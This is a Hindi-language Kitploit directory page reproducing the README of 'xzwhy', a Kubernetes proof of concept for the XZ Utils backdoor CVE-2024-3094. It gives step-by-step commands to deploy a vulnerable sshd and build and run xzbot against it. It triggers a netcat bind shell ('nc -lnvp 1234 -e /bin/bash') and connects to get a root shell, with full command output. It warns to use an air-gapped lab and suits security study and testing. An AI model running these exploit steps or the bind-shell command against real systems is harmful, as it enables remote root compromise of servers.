Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
xzwhy — XZ Utils CVE-2024-3094 POC Kubernetes के लिए | Kitploit
उपकरण/GitHubGitHub/neuralinhibitor/xzwhy
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubneuralinhibitor/xzwhy

xzwhy

XZ Utils CVE-2024-3094 POC Kubernetes के लिए

रिपॉजिटरी देखें
52 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

xzwhy

root@kitploit:~
 _  _  ____  _  _ 
( \/ )(_   )( \/ )
 )  (  / /_  \  / 
(_/\_)(____) (__) 

यह प्रोजेक्ट XZ Utils को प्रभावित करने वाले CVE-2024-3094 के लिए एक Kubernetes-अनुकूल प्रूफ ऑफ कॉन्सेप्ट (POC) है। एक्सप्लॉइट के उद्गम और तंत्र के उत्कृष्ट वॉकथ्रू के लिए यह लेख देखें।

चेतावनी

⚠⚠⚠

नीचे दिए गए किसी भी कमांड को चलाने से एक असुरक्षित एप्लिकेशन तैनात हो सकता है जो हमले के प्रति अत्यधिक संवेदनशील है। यदि आप इन चरणों का पालन करना चुनते हैं, तो ऐसा एयरगैप्ड परीक्षण वातावरण में करने की अनुशंसा की जाती है।

⚠⚠⚠

निर्देश

1: असुरक्षित एप्लिकेशन तैनात करें

root@kitploit:~
kubectl create -f xzwhy.yml

यह एक असुरक्षित SSH एंडपॉइंट तैनात करेगा जिसका एंट्रीपॉइंट /bin/bash -c "env -i LANG=en_US.UTF-8 && unset TERM && unset LD_DEBUG && LD_LIBRARY_PATH=/CVE-2024-3094/ /usr/sbin/sshd -p 2222 -D" है।

2: असुरक्षित एंडपॉइंट का URL प्राप्त करें

असुरक्षित SSH एंडपॉइंट लोड बैलेंसर के माध्यम से दो पोर्ट प्रदर्शित करता है: 2222 SSH कनेक्शन सुनता है और 1234 एक सुविधा है जो बाइंड शेल पोर्ट पर इनग्रेस की अनुमति देता है जिसका हम एक्सप्लॉइट के दौरान उपयोग करेंगे।

root@kitploit:~
  type: LoadBalancer
  ports:
    - name: ssh
      protocol: TCP
      port: 2222
      targetPort: 2222
    - name: exploitshellingress
      protocol: TCP
      port: 1234
      targetPort: 1234

हम kubectl का उपयोग करके तैनात लोडबैलेंसर का URL निकाल सकते हैं:

root@kitploit:~
xzwhy_endpoint=`kubectl get services -o jsonpath='{.items[0].status.loadBalancer.ingress[0].hostname}' --namespace=xzwhy-ns --field-selector metadata.name=xzwhy-loadbalancer` && echo $xzwhy_endpoint

3: एक दुर्भावनापूर्ण SSH कनेक्शन बनाकर हमला शुरू करें

अब हम teamnautilus/xzbot उपयोगिता का उपयोग करके असुरक्षित सर्वर से कनेक्ट होते हैं:

root@kitploit:~
docker run -it --rm golang:latest /bin/bash -c "mkdir -p /xzbot && pushd /xzbot/ && git clone https://github.com/amlweems/xzbot.git && ls -laF && pushd ./xzbot/ && go build -o /xzbot/tmp/; popd && /xzbot/tmp/xzbot -h && /xzbot/tmp/xzbot -addr $xzwhy_endpoint:2222 -cmd 'nc -lnvp 1234 -e /bin/bash'"

यह असुरक्षित SSH सर्वर को हमारी ओर से nc -lnvp 1234 -e /bin/bash के माध्यम से एक बाइंड शेल निष्पादित करने का कारण बनेगा। इस कमांड को चलाने के बाद आपको कुछ इस प्रकार दिखाई देना चाहिए:

root@kitploit:~
Cloning into 'xzbot'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 30 (delta 14), reused 25 (delta 10), pack-reused 0
Receiving objects: 100% (30/30), 422.65 KiB | 8.99 MiB/s, done.
Resolving deltas: 100% (14/14), done.
total 12
drwxr-xr-x 3 root root 4096 Apr 17 22:37 ./
drwxr-xr-x 1 root root 4096 Apr 17 22:37 ../
drwxr-xr-x 4 root root 4096 Apr 17 22:37 xzbot/
/xzbot/xzbot /xzbot /go
go: downloading github.com/cloudflare/circl v1.3.7
go: downloading golang.org/x/crypto v0.21.0
go: downloading golang.org/x/sys v0.18.0
/xzbot /go
Usage of /xzbot/tmp/xzbot:
  -addr string
        ssh server address (default "127.0.0.1:2222")
  -cmd string
        command to run via system() (default "id > /tmp/.xz")
  -seed string
        ed448 seed, must match xz backdoor key (default "0")
00000000  00 00 00 1c 73 73 68 2d  72 73 61 2d 63 65 72 74  |....ssh-rsa-cert|
00000010  2d 76 30 31 40 6f 70 65  6e 73 73 68 2e 63 6f 6d  |[email protected]|
00000020  00 00 00 00 00 00 00 03  01 00 01 00 00 01 01 01  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000130  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 01 14 00 00 00 07  73 73 68 2d 72 73 61 00  |........ssh-rsa.|
00000170  00 00 01 01 00 00 01 00  34 12 00 00 78 56 00 00  |........4...xV..|
00000180  a2 ff d9 f9 ff ff ff ff  a1 36 c4 cc b3 b2 4d b3  |.........6....M.|
00000190  99 11 52 a7 2c 38 d2 29  f9 5d 1a 06 63 36 1e 48  |..R.,8.).]..c6.H|
000001a0  9c 95 4e f1 77 41 07 92  1c a4 9f b0 b4 dc 93 c2  |..N.wA..........|
000001b0  66 03 3d fa 5c 8b 49 41  86 26 42 88 2b 9d 5b 4c  |f.=.\.IA.&B.+.[L|
000001c0  b8 a4 5e 9d 62 c3 51 0a  be ca 5d 8a 47 45 3a 1e  |..^.b.Q...].GE:.|
000001d0  99 1f c1 0e 97 b7 58 ec  51 45 5b 24 3f b4 69 6a  |......X.QE[$?.ij|
000001e0  68 45 7c 3b 3a d9 d7 0a  ad 09 04 d8 a1 b9 81 22  |hE|;:.........."|
000001f0  58 69 eb 07 ad 91 53 15  b2 1d bf 47 b9 48 a0 4e  |Xi....S....G.H.N|
00000200  8b 28 cd 82 4b fd 72 17  12 ce 7f e7 15 3c 9e fa  |.(..K.r......<..|
00000210  a7 e1 d6 e4 ec eb 66 34  5a 74 00 00 00 00 00 00  |......f4Zt......|
00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000230  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000250  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000270  00 00 00 00 00 00 00 00  00 00 00 10 00 00 00 07  |................|
00000280  73 73 68 2d 72 73 61 00  00 00 01 00              |ssh-rsa.....|

4: लाभ उठाएं

आपके द्वारा स्पॉन किए गए शेल से कनेक्ट करें। xzwhy_endpoint वेरिएबल के उपयोग पर ध्यान दें:

root@kitploit:~
nc $xzwhy_endpoint 1234

यह तुरंत स्पष्ट नहीं है, लेकिन उपरोक्त कमांड रूट के रूप में एक बाइंड शेल से कनेक्ट होता है। आप विभिन्न कमांड चलाकर इसका परीक्षण कर सकते हैं:

root@kitploit:~
whoami
root
root@kitploit:~
hostname -i
10.0.128.62

5: सफाई

root@kitploit:~
kubectl delete -f xzwhy.yml

श्रेय

  • teamnautilus ने एक एक्सप्लॉइट के लिए असुरक्षित सर्वर बनाया
  • amlweems ने असुरक्षित SSH एंडपॉइंट का शोषण करने के लिए एक स्वचालित उपकरण प्रकाशित किया
  • patorjk ने एक उत्कृष्ट टेक्स्ट-टू-ASCII कला जनरेटर बनाया
टूल डाउनलोड करें